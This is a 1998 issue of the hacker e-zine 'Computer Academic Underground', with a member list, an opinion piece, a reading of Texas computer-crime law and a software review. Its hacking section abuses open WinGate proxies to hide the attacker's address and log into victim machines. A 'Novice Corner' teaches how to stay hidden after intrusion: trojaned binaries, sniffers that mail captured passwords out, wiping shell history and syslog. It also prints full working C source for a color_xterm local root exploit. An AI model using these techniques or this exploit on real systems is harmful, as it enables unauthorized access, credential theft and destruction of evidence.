_____________________________________________ / \ | ___________________________________ | | | | | | | | | | | | | | | | | | | | | _________| | | | | | / \ | | | | / \ | | | | / \ | | | |__________/ \__________| | | / | \ | | / | \ | | / | \ | | /______________|______________\ | | | | Computer Academic Underground | | | | Electronic Magazine | | #0015 | | 0115.98 | \ _____________________________________________ / ############################################################################## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ============================================================================== ------------------------------------------------------------------------------ .............................................................................. Table of Contents Foreward General Member Listing -= CAU =- 817 2600 Meeting -= CAU =- What is Skill? I)ruid Computer Crimes And The Law MajestiX UNIX Software Review Protocol Hacking WinGate by Association Variety I)ruid's Novice Corner I)ruid Exploit of the Month -= CAU =- Phreaking Closing ############################################################################## Foreward I love how this month's Hacking section seems to go in order... How to get to a system safely (WinGate By Association), what to do once your there (I)ruid's Novice Corner), and how to bust root (Exploit of the Month). That worked out quite nicely this month, didn't it? However, the tradeoff, we have NO phone related articles for the Phreak section this month... maybe someone will contribute one next month. But anyway, go read, there's some good stuff in here. I)ruid ############################################################################## General %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Member Listing (In the order in which they were brought into the CAU) Handle IRC Nick E-Mail -------------------------------------------------------------- I)ruid I}ruid druid@caughq.org Ultra Violet uv_ uv@caughq.org Crimson Assassin Crimson_A crimson@caughq.org Fizban Fizban^ fizban@caughq.org Sublime sublime sublime@caughq.org int3l int3l int3l@caughq.org MajestiX maJesTix majestix@caughq.org -------------------------------------------------------------- -= CAU =- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 817 2600 Meeting First Friday of Every Month 6:00pm until 9:00pm Cafe Cybre 481 Harwood Road Hurst, Texas Phone: METRO: 817.268.0060 "It's what's fer dinner!" -= CAU =- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% What is Skill? Allright, I'm sick and tired of hearing about who has how much skill and who dosn't. I'm gonna tell you all /MY/ definition of skill, which will probably not match anyone else's definition of skill, especially the warez-hoar's definitions, the skript-kiddie's definitions, etc. No one knows what skill really means, yet everyone's always all too ready to say they have more 'skill' than someone else. First of all, 'skill' isn't how many scripts you own. Or how many exploits you can hoard. Or how many gigs of warez you have. If that is your definition of 'skill' then your in for a BIG dissapointment in this article. To me, 'skill' is exactly what the word means. It means that you are skilled at something. Now if you consider flaunting around the internet collecting scripts a skill, then yes, you are skilled at something very very lame and pointless. When the term 'skill' is used in reference to hacking, it means exactly that, you are skilled at hacking. Collecting every exploit known to man is not a skill, it's a lame attempt at being skilled. Being skilled at hacking is being able to come up with NEW and INVENTIVE things, not copying other people's exploit code, taking other people's skripts and using them to make you seem 'elite', or trading warez for shell accounts that you supposedly 'hacked'. NEW and INVENTIVE things will get you respect. NEW and INVENTIVE things will show that you have skill. Also, dedication and HARD WORK (something alot of you know nothing about) shows that you have skill. Also, if you think that sp3ll1ng w1th numb3rs makes you look like you have skill, your wrong. It just makes you look like a damn fool, unless there is a reason for the numbers. If you havn't gotten the picture by now, let me break it down for you with a few examples. Take int3l for example. int3l is probably one of the most skilled people I know. He has done stuff with phones, computers, anything, you name it, that I would have never thought possible. And he dosn't give up like alot of you little skript kiddies do. If he couldn't do something, he kept trying, and trying, and trying until he DID it. Another example is Crimson Assassin. Crim refuses to believe that he can't learn something. If he needs to set something up, he sits down and LEARNS how to do it. He dosn't go out and try to find someone to do it for him, HE does it. THAT is skill. Crim is also probably one of the few skilled people I know. If you don't have this type of skill, you will never be anything more than a skript kiddie, an exploit hoar, or a warez pup. That's all there is to it. Anyway, that's my views on so-called 'skill', so I'll get off my soap box now and go on with my life. And just remember, each and every member of CAU is skilled. If they weren't, they would never even have been considered at all to be brought into the CAU. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Computer Crimes and the Law Well, one night I was sitting in IRC doing nothing (as usual) and got this strange urge to write a article for the the zine (cau-0015) and this was even before 14 was released. And, if you were in IRC at the time, you were remember me asking for some article ideas, and I recalled my old political stage. So I thought of this topic, and I went and pulled up all my old "Computer Law's" files, including: VERNON'S TEXAS STATUTES AND CODES ANNOTATED COPR. (c) WEST 1990 No Claim to Orig. Govt. Works PENAL CODE TITLE 7. OFFENSES AGAINST PROPERTY CHAPTER 33. COMPUTER CRIMES These particular statues and other codes are for Texas, but you can relate the same consequences to your area, im sure. As the "internet population" increases, more and more incidents will be made and filed. Im sure you have read a couple newspaper articles dealing with some kind of computer crimes or another. Recent cases which im sure you can recall are the Ed Cummings (Bernie S.), and of course the good ole' Kevin Mitnick cases. The case with Ed Cummings doesnt really tie in with the whole computer crime idea, but in a sense it is very much related. The Kevin Mitnick case on the other hand was a great relation with computer crimes in general. Anwyays, enough of this jibber-jabbish bullshit lingo jingo, john grisham bull shit. Lets get down to the details. Basically, like most situations, their are, The Situation and The Consequence. Simple concept, but it gets much more complexed as it is examined. Now, as I said before, LETS GET TO THE DAMN DETAILS! Alright, I will break it down into "simple concepts." Harmful Access is considered to be: (a) A person commits an offense if the person intentionally or knowingly and without authorization from the owner of the COMPUTER or a person authorized to license access to the COMPUTER: (1) damages, alters, or destroys a COMPUTER, COMPUTER program or software, COMPUTER system, data, or COMPUTER network; (2) causes a COMPUTER to interrupt or impair a government operation, public communication, public transportation, or public service providing water or gas; (3) uses a COMPUTER to: (A) tamper with government, medical, or educational records; or (B) receive or use records that were not intended for public dissemination to gain an advantage over business competitors; (4) obtains information from or introduces false information into a COMPUTER system to damage or enhance the data or credit records of a person; (5) causes a COMPUTER to remove, alter, erase, or copy a negotiable instrument; or (6) inserts or introduces a COMPUTER virus into a COMPUTER program, COMPUTER network, or COMPUTER system. (b) An offense under this section is a: (1) felony of the second degree if the value of the loss or damage caused by the conduct is $20,000 or more; (2) felony of the third degree if the value of the loss or damage caused by the conduct is $750 or more but less than $20,000; or (3) Class A misdemeanor if the value of the loss or damage caused by the conduct is $200 or more but less than $750. Basically, it looks like a bunch of shit, I know, but its really not. Read it, and it is self-explanatory. All it is really saying is, the more damage caused by the conduct, the more your fucked over. Yes, that is of course fair, *regardless* of the situation. But! The part that isnt fair is, the court system isn't fair, the network you either accidently or purposely damaged isn't fair either. Remember kids, the second a system/network detects a "intruder" or a problem, they dont have to call big brother right away, hell they can wait a couple months. You know what advantage this gives them? Yup, false evidence. Trust me, when you hurt a System Admin's Ego, you hurt his whole reputation. And Admins do NOT like to have their reputation hurt. Which means, their gonna fuck you over in any way then can. In a way you deserve it, but only to a certain degree. So, what can you do to defend yourself against this kind of mess? Simple, hire a good ass lawyer, Robert Shapiro, etc., and get yourself a defense fund. Its simple, and in-expensive. Also, check out http://www.hackerz.org and they will be able to help you out in some way or another probably. Well, the above statues cover a general range of "harmful computer activities." So, now lets cover the simple computer crime, un-authorized (attempted or successful, doesnt matter) access areas. So here I go, break it down niggahz! (1)A offense may be prosecuted in: the county of the principal place of business of the owner or lessee of a COMPUTER, COMPUTER system, or COMPUTER network involved in the violation. Basically, thats saying, well if your in Texas, and you harm/violate (yes you can rape a computer) a computer in lets say... Washington D.C., the System Admin/Represenetive can hold the trial in Washington D.C. Now, their are waives that can be waived during the beginning of the trial to alter this. (2) A person commits an offense if the person: (A) uses a COMPUTER without the effective consent of the owner of the COMPUTER or a person authorized to license access to the COMPUTER and the actor knows that there exists a COMPUTER security system intended to prevent him from making that use of the COMPUTER; or (B) gains access to data stored or maintained by a COMPUTER without the effective consent of the owner or licensee of the data and the actor knows that there exists a COMPUTER security system intended to prevent him from gaining access to that data. Well, this is saying that a person who uses a COMPUTER without the consent of the owner or consent of a homie who has consent of the owner is commiting an offense and therefore can be prosecuted with reasonable evidence provided by the prosecutor. Then, after that, it says that anyone who accesses stored data without the consent of the owner, or consent of the homie who has consent of the owner can be prosecuted. (3) A person commits an offense if the person intentionally or knowingly gives a password, identifying code, personal identification number, debit card number, bank account number, or other confidential information about a COMPUTER security system to another person without the effective consent of the person employing the COMPUTER security system to restrict the use of a COMPUTER or to restrict access to data stored or maintained by a COMPUTER. Again, this is saying that if a person gives another person any system manditory information such as a passwd, etc. He can be prosecuted. Or, if he gives any financial data (Which not to mention is a Federal Offense) or any other financial related data, that person too can be prosecuted. (4)An offense under this section is a Class A misdemeanor. Last but not least, any of the top 3 offenses, will be delt with a Class A misdemeanor, which really is nothing at all, unless the COMPUTER system/network has false evidence, it can be GREATLY increased (the consequence that is). Not to mention, most computer related crimes are becoming federal offenses, which means, more felonys for your record. Closing, well, the statues were pretty self-explanatory as mentioned before, but I just wanted to present this information and explain it, even thought it didnt really matter how much I explained it, it was still the same pretty much. All questions, comments and/or death threats proceed to majestix@caughq.org and/or majestix@punkrawk.net. Thanks, maJesTix %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Unix Software Review Well here we go again. Just thought i'd give a few paragraphs about some of the software I enjoy under Linux. Most have heard of Enlightenment but if you have not played with it I highly reccommend it. It is a very graphical window manager that is very configurable. It is still under development but is pretty stable. It does suck up your resources (but what were you going to use those for anyway?). I have been using it for about 4 or 5 months now I think. I switched to AfterStep again for a little but, I came back because E is just comfortable to work in. There are several programs that have the same look or feel to E, like Eterm. Eterm is a terminal program that allows a background graphic (nice effect). Also there is Eplus, which is a: CD Player Clock CPU Load Meter Network Load Meter File System Meter Etc. Etc. It is a good program to have running. Although I have had problems compiling all the modules. Languages First Look Also with this article I just want to go over some languages and why you might use them. Well first up is Expect, a language for automating tasks such as making ftp connect to a client machine and d/l files to be backed up, telnet to a list of hosts and check for a wingate prompt :), or any other tasks you can do at a terminal (well maybe not all but, close). The best way to start is to get the package. Look for the file autoexpect. Autoexpect will start a sub-shell and watch what you type and make a script when you exit the sub-shell. I think it's script.exp or something. Then just fire up pico or whatever your poison is and edit the sucker. Autoexpect has some command line parameterss, but the only one I remember is "-p" which makes the script only match the last line of output. Otherwise, if you do a date command or an ls it would expect to see the same results as when you first made the script. If you have written any chat scripts the send, expect seq is similar (I don't care for chat too much but Expect I like). One last thing this issue: TCL/Tk. TCL/Tk should have come before expect because Expect uses TCL. A nice thing that TCL/Tk can do is make a GUI front-end to a command line program (you know you like them don't try to deny it). It also has interpreters for most platforms so your code is portable(ha!). Next issue i'll go into more on TCL/Tk. Guess that's it. CUL8TR... Protocol (the way to do things) ############################################################################## Hacking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% WinGate by Association and Practical Application Disclaimer Type Thing: By reading any of the following, I, the author, take NO responsibilty for your actions, I'm providing this information for purely the sake of knowing, I don't condone, in fact, I forbade you to even consider actually trying any of the things mentioned here. If you don't agree to any of those things, or if you're even thinking about trying something contained hereafter, you'd better just stop reading this article and go sit in the corner. Well, Christmas is gone, and New Years over as well by the time this is read, and besides all of the new bugs in Windows95 discovered, the flaw in the pentium chip, and all of the rest of 97's goodies, one more tips its hat to the hacker society and its sub-hierarchy before the new year. WinGate. The program is originally intended to allow LANs and other networks to share one internet connection and access the internet through it, but, the program is flawed in that it doesn't limit that access to merely the local network by default, instead it allows everyone and their grandmother to easily use the service. The bug's discovery is credited to a 15 year old hacker, Joshua E. Rodd, and more details on the bug, as well some more information, and even a workaround can be found at the following sites: http://www.ntsecurity.net/security/wingate.htm http://www.deerfield.com/wingate/ (WinGate's Homepage) But anyways, this bug gleans a result close to that of actual ip spoofing, though not quite as versatile - simply laundering your ip address to that of the machine's you're exploiting, similar to telnet gateways in effect (as MajestiX pointed out to me). And I truly hope I don't need to go more into detail of its uses... As follows is a sample exploitation, the ip addresses covered to protect the "innocent." Note also, it doesn't require any privelages but the use of telnet. And, Anguish is used to represent the attacker's machine, wingate.relay.com as the wingate machine, and martyr.com as the machine being attacked - of course, text surrounded by {} is what is being typed by the attacker... --Begin Example-- Anguish:~# {telnet} telnet> {op} (to) {wingate.relay.com 23} Trying wingate.relay.com... Connected to wingate.relay.com. Escape character is '^]'. WinGate>{blah.martyr.com 23} Connecting to host blah.martyr.com...Connected Scapegoats, Martyrs, etc. (blah) (%t) For anonymous ftp use ftp.martyr.com; use blah.martyr.com for telnet/rlogin login: {purloined} Password: [blah]:/d/purloined> {who |grep purloined} purloined ttypb June 6 06:00 (wingate.relay.com) --End Example-- Now then, that example was done in linux, but is just as easily reproduced in windows using their default telnet client. Now then, a sum up of that session. First, the telnet program was opened, and port 23 of the relay machine telnetted to (The Telnet/WinGate port). At the 'WinGate>' prompt, the target machine's addy was entered in (it can be in numerals or unresolved form, and the port defaults to 23 if not otherwise specified), and then the WinGate machine connected to the victim. The user logged in, did a who, and low and behold, look at the apparent originating ip. Neet, huh? Well, right now you're probably thinking, "Well, there must be some downside, some uncommonly easy way for people abusing this flaw to be traced back to their real ip." But, this is truly a dream come true, because not only is this attack so easy to pull off, the version of WinGate affected by this bug does *not* do any logging. And now for some obviously less useful applications of this! Using an IRC client with this; First, I'll start with the commands with mIRC and move on to those for BitchX. Start by typing {/server wingate.relay.com 23} which'll connect your client to the WinGate machine. In mIRC at least, it'll spit a few strings at the prompt, as it's just a dumb program, and can't tell an IRC server from the 'WinGate>' prompt, but those are of no consequence. Next, {/raw irc.server.here 6666}, which simple serves to send 'irc.server.here 6666' to the WinGate prompt, without letting the client parse the string. It'll hopefully connect, and when it does, you'll probably get nothing returned, and if there's a problem, it'll probably just be that the IRC Server is out of connections, and that'll disconnect your client with a message, but just reconnect and try again... Now then, you're at the blank part, so type {/raw NICK Nick} to send your nick request to the irc server, followed by {/raw user variety abc abc :Real Name} 'abc abc' can be anything you want, it doesn't matter, and just mod the rest to suit your own preferences. And now you're on IRC... /whois yourself and look, your ip is that of the WinGate machine, ooOOoo. Now go and scare all your lame friends with your skills and make them worship ;-) And next, for an easier method. In mIRC, click Setup->Firewall, and check the 'SOCKS Firewall' box. In the hostname blank, enter the hostname of the WinGate machine, and leave the port at 1080, the default - do not enter anything for a user or password. Then, choose your IRC server and connect as normal, a much easier, and a less round-about way of doing things. Though a note on that is that if the wingate server isn't up, or if you stick in a bad address, etc, then mIRC will *freeze* for a minute or two before it realizes that fact. Just be patient and it'll unfreeze and return the error. And another thing: if the WinGate host you are on has an identd client, your UID (username) will default to what the identd server is already set to, rather than what you tell the IRC server upon connecting (or what your client tells it). And now, for the BitchX client. First, connect with {/server wingate.relay.com:23}. The :23 is important there, for the way that the client parses connect strings - if there's a space, then it'll interpret that as 1st server: wingate.relay.com, 2nd server: 23, and try and connect to the default irc port on the wingate server. Next, the client'll again spit out its commands at the 'WinGate>' prompt, but just ignore the error messages, and type {/quote irc.server.here 6666}. Note there the space, it must be there, and don't forget the port. In this client, /quote is the command to send text directly to the server (if you didn't already infer the same). Following that, the wingate server will respond with 'Connected to irc.server...' or something along those lines, same as with mIRC, so again, respond here with {/quote NICK Nick} followed by {/quote user variety abc abc :Real Name} and again, 'abc abc' can be anything you'd like. Credit for the first trick solely belongs to the Unabomber, who also wrote a great document "The Official 'How to Spoof WinGate' Guide," and yes, this was the background for most of this section of the article (well, excepting the BitchX part). The second trick (with SOCKS), is credited to Matricide and Deth, and thanks go out to them as well for simplifying things, though I feel I should add a comment over that method. I've heard from numerous places that SOCKS proxy's are logged even more-so than sendmail, so...use at your own risk. And YES, both of these methods will LAG YOUR IRC CONNECTION (just thought I'd throw that in). All you're still doing is piggy backing a connection from another ip, possibly a ppp connection, so bLeH. Phew, that was a mouthful - and now on to the brief subject of scanning. For Windows, point your browser at http://members.xoom.com/unabomber/ -- the home of the Cabral Domain Scanner, a really nice freeware app that does wonders for hunting WinGate servers, along with a few existing ones, some q&a stuff, and the WinGate spoofing guide aforementioned. For *nix on the other hand, there's a multitude of existing scanners that would do the job, though you will probably be troubled to find one meant specifically for WinGate scanning. Joshua realeased a homemade one he dubbed "lndrmat", but took it back down 2 days after he realeased it, but just in case you don't believe me, you can find its page at: http://www.geocities.com/Heartland/Prairie/2646/lndrmat.html Also, Joshua has said that he's made the original code available for informational purposes only at his homepage, though I haven't had any luck as to accessing it quite yet. But if you do, please do me a favor and send me a copy. Anyways, here the link is: http://www.roddsite.home.ml.org/lndrmat.html And, I suppose that wraps this article up. On a parting note, I'd once again like to thank the Unabomber, for his great page and utility, along with Matricide and Deth for their contribution. Also, exploit your hearts out, as you can see the possibilties from this, and you know its going to become about as obsolete as phf is now, but for now its great fun. And to think, it was listed at ntsecurity.net on 10/21/97, yes, October 21st, and look how widely known it is now :-P But, lately, things are starting to hit the fan - people are getting g-lined for WinGate attacks, auto-banned, and servers are going down... I was also thinking of adding a short list of WinGate servers to this, but hey, get your own! ;-) Just scan a domain (personally, I'd suggest the canadian cable modem domains, hint hint), and stay out of trouble and I hope you're further enlightened after reading this. Questions? Comments? Mail me... Variety (var1ety@hotmail.com) [ EDITOR'S NOTE: In response to this article, I'm working on a few utilities that implement this technique, such as a telnet/ftp bouncer, and a HackIt! module to scan for WinGate machines. Look for them soon. ] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% I)ruid's Novice Corner: Top 10 General Good Ideas (once your in a system) In this article, I'm going to go over some general good practice for once you have gotten into a system and are at a shell, preparing to bust root and move on with your life. None of this should be OS specific, just general unix environment. 1) NO EXCESSIVE COMMAND-LINE - Once you've gotten into a shell, using as little command-line as possible is a good idea. If you need to go to a website such as rootshell to grab an exploit, stuff like: 18888 6 S 0:00 lynx http://www.rootshell.org as opposed to: 18888 6 S 0:00 lynx tend to show up in process lists. This can also keep stuff like this entry out of your .history file: ftp here.are.the.exploits.com as opposed to: ftp Most applications and utilities allow you to execute them and later enter the target system. So don't get lazy and attempt to do all your steps at once. If you have to do commandline that is noticable, try putting it in a script, then run the script. The script will execute all the commandline faster than you could normally, which lessens the chance of it being noticed as your executing it. 2) DON'T GO BACK TO YOUR OWN MACHINE - This is just generally a good idea, especially if your on a static IP at the time. If your machine is a dialup dynamic PPP account, you are a little more safe, but it's still not a good idea. Any sysadmin with half a clue can go through his logs and check for connections from the hacker back to their own machine to get exploits, etc. The best bet is to get exploits from a well known source, such as rootshell, etc. It's also not a good idea to use your normal dialup account as well, since most OS's do log where all incoming connections come from. 3) DON'T CREATE LOGINS - It is much harder to get caught if you are simply using an authorized user's login, rather than one that you created and gave root access to, etc. By using/modifying an existing user, and acting as that user, you are less noticable. Also while acting as an authorized user, you can work within that user's home directory, in hidden directories you create. However, while using another user's account, see #4. 4) DON'T INTERACT WITH OTHER USERS - In other words, don't talk to strangers. Don't leave visible files in random users's home directories. Don't pretend to be a user and talk to that user's friends and soil their reputation. Things like this are mean, and unless there's a reason to, you normally do not want to just go around ruining random people's credibility. And aside from that, that user will eventually find out that someone's been acting/talking as him, and will probably inform the System Administrator resulting in your account being terminated. 5) MASK YOURSELF - (if you have root) set up trojan binaries, such as ps and w and such that can hide your login and processes. Many of these modded programs exist for various platforms and are easily obtainable, and normally don't take much to set up. If root can't see you or what your doing, he can't notice you. 6) SET UP A SNIFFER - (if you have root) set up a packet sniffer and allocate some way to retreive the sniffer logs as anonymously as possible. One good way to retrieve these logs is to set up a anonymous hotmail account, and have cron run a script daily to mail out and then reset the sniffer logs. Sniffers are EXTREMELY useful tools for not only finding out more information about the current system and it's users, but for obtaining logins and passwords for other systems as well. There are a wide variety of packet sniffers available on the net for what type of information you want to obtain from a system and what OS that system is running. 7) DON'T ATTACK OTHER SYSTEMS - Unless you want to get noticed, i wouldn't suggest launching pingfloods and other such attacks against any other systems. The System Administrator of the machine getting attacked will surely notice the attack and contact the Sysadmin of the machine your attacking it from, which will probably result in you losing your access to the system. 8) NULL OUT CERTAIN FILES - Before leaving the system, you may want to null out certain files like .history, .bash_history (in the user home directory) by doing an echo > .history, grep -v the syslog, etc. If you don't know what these commands do, sit down and read a unix book or manpage and learn something. 9) DON'T TRUST LOGINS AND PASSWD'S FROM EGYPTIANS - If an egyptian gives you logins and passwords, don't use them... Just don't. (: 10) DON'T DO ANYTHING STUPID - A particular case comes to mind where an associate who remains nameless was in a system and was echoing "METALLICA SUCKS!!!!" to all the terminals that people were logged in on. Obviously, someone would notice that and inform the System Administrator, or better yet, he could inform himself if he happened to be online under a user account. Don't assume that just because root isn't logged in that root isn't logged in. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Exploit of the Month Allright, I havn't seen any really good root-busting exploits lately, and teardrop, bonk, boink, and every other teardrop mod that has come out lately is getting real old, so this month's exploit is an older one, but a good one. In fact, this exploit was the exploit Sublime used to bust root on the CAUGHQ Server before I locked down Xwindows. He's the only person as far as I know to bust root on the CAUGHQ Server, and color_xterm.c is the exploit he used to do it. --=< snip > /* * color_xterm buffer overflow exploit for Linux with non-executable stack * Copyright (c) 1997 by Solar Designer * * Compile: * gcc cx.c -o cx -L/usr/X11/lib \ * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//` * * Run: * $ ./cx * system() found at: 401553b0 * "/bin/sh" found at: 401bfa3d * bash# exit * Segmentation fault */ #include #include #include #include #include #include #include #include #include #define SIZE1 1200 /* Amount of data to overflow with */ #define ALIGNMENT1 0 /* 0..3 */ #define OFFSET 22000 /* Structure array offset */ #define SIZE2 16000 /* Structure array size */ #define ALIGNMENT2 5 /* 0, 4, 1..3, 5..7 */ #define SIZE3 SIZE2 #define ALIGNMENT3 (ALIGNMENT2 & 3) #define ADDR_MASK 0xFF000000 char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2]; int *ptr; int pid, pc, shell, step; int started = 0; jmp_buf env; void handler() { started++; } /* SIGSEGV handler, to search in libc */ void fault() { if (step < 0) { /* Change the search direction */ longjmp(env, 1); } else { /* The search failed in both directions */ puts("\"/bin/sh\" not found, bad luck"); exit(1); } } void error(char *fn) { perror(fn); if (pid > 0) kill(pid, SIGKILL); exit(1); } int nz(int value) { if (!(value & 0xFF)) value |= 8; if (!(value & 0xFF00)) value |= 0x100; return value; } void main() { /* * A portable way to get the stack pointer value; why do other exploits use * an assembly instruction here?! */ int sp = (int)&sp; signal(SIGUSR1, handler); /* Create a child process to trace */ if ((pid = fork()) < 0) error("fork"); if (!pid) { /* Send the parent a signal, so it starts tracing */ kill(getppid(), SIGUSR1); /* A loop since the parent may not start tracing immediately */ while (1) system(""); } /* Wait until the child tells us the next library call will be system() */ while (!started); if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH"); /* Single step the child until it gets out of system() */ do { waitpid(pid, NULL, WUNTRACED); pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); if (pc == -1) error("PTRACE_PEEKUSR"); if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); } while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK)); /* Single step the child until it calls system() again */ do { waitpid(pid, NULL, WUNTRACED); pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); if (pc == -1) error("PTRACE_PEEKUSR"); if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); } while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK)); /* Kill the child, we don't need it any more */ if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL"); pid = 0; printf("system() found at: %08x\n", pc); /* Let's hope there's an extra NOP if system() is 256 byte aligned */ if (!(pc & 0xFF)) if (*(unsigned char *)--pc != 0x90) pc = 0; /* There's no easy workaround for these (except for using another function) */ if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) { puts("Zero bytes in address, bad luck"); exit(1); } /* * Search for a "/bin/sh" in libc until we find a copy with no zero bytes * in its address. To avoid specifying the actual address that libc is * mmap()ed to we search from the address of system() in both directions * until a SIGSEGV is generated. */ if (setjmp(env)) step = 1; else step = -1; shell = pc; signal(SIGSEGV, fault); do while (memcmp((void *)shell, "/bin/sh", 8)) shell += step; while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000)); signal(SIGSEGV, SIG_DFL); printf("\"/bin/sh\" found at: %08x\n", shell); /* buf1 (which we overflow with) is filled with pointers to buf2 */ memset(buf1, 'x', ALIGNMENT1); ptr = (int *)(buf1 + ALIGNMENT1); while ((char *)ptr < buf1 + SIZE1 - sizeof(int)) *ptr++ = nz(sp - OFFSET); /* db */ buf1[SIZE1 - 1] = 0; /* buf2 is filled with pointers to "/bin/sh" and to buf3 */ memset(buf2, 'x', SIZE2 + SIZE3); ptr = (int *)(buf2 + ALIGNMENT2); while ((char *)ptr < buf2 + SIZE2) { *ptr++ = shell; /* db->mbstate */ *ptr++ = nz(sp - OFFSET + SIZE2); /* db->methods */ } /* buf3 is filled with pointers to system() */ ptr = (int *)(buf3 + ALIGNMENT3); while ((char *)ptr < buf3 + SIZE3 - sizeof(int)) *ptr++ = pc; /* db->methods->mbfinish */ buf3[SIZE3 - 1] = 0; /* Put buf2 and buf3 on the stack */ setenv("BUFFER", buf2, 1); /* GetDatabase() in libX11 will do (*db->methods->mbfinish)(db->mbstate) */ execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1, NULL); error("execl"); } --=< snip > Well, that's it... funfun... Next month we'll put in something NEW. (: -= CAU =- ############################################################################## Phreaking ############################################################################## Closing Well, isn't that a pretty Phreaking section? Just had to complain about that again... I can't write the whole zine myself, someone contribute for once. I'd like to thank Variety, Protocol, and MajestiX for contributing recently, and Protocol and MajestiX for contributing repeatedly. Maybe someone else will take their lead and get off their asses and do something useful. That and if I didn't write at least two articles for each issue I might have time to sit down and code something, like maybe some more HackIt! modules. By the way, The HackIt! Project now has it's own seciton on the CAUGHQ website... look for it under the 'Projects' section. Well, that's it for this month... I)ruid ############################################################################## ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground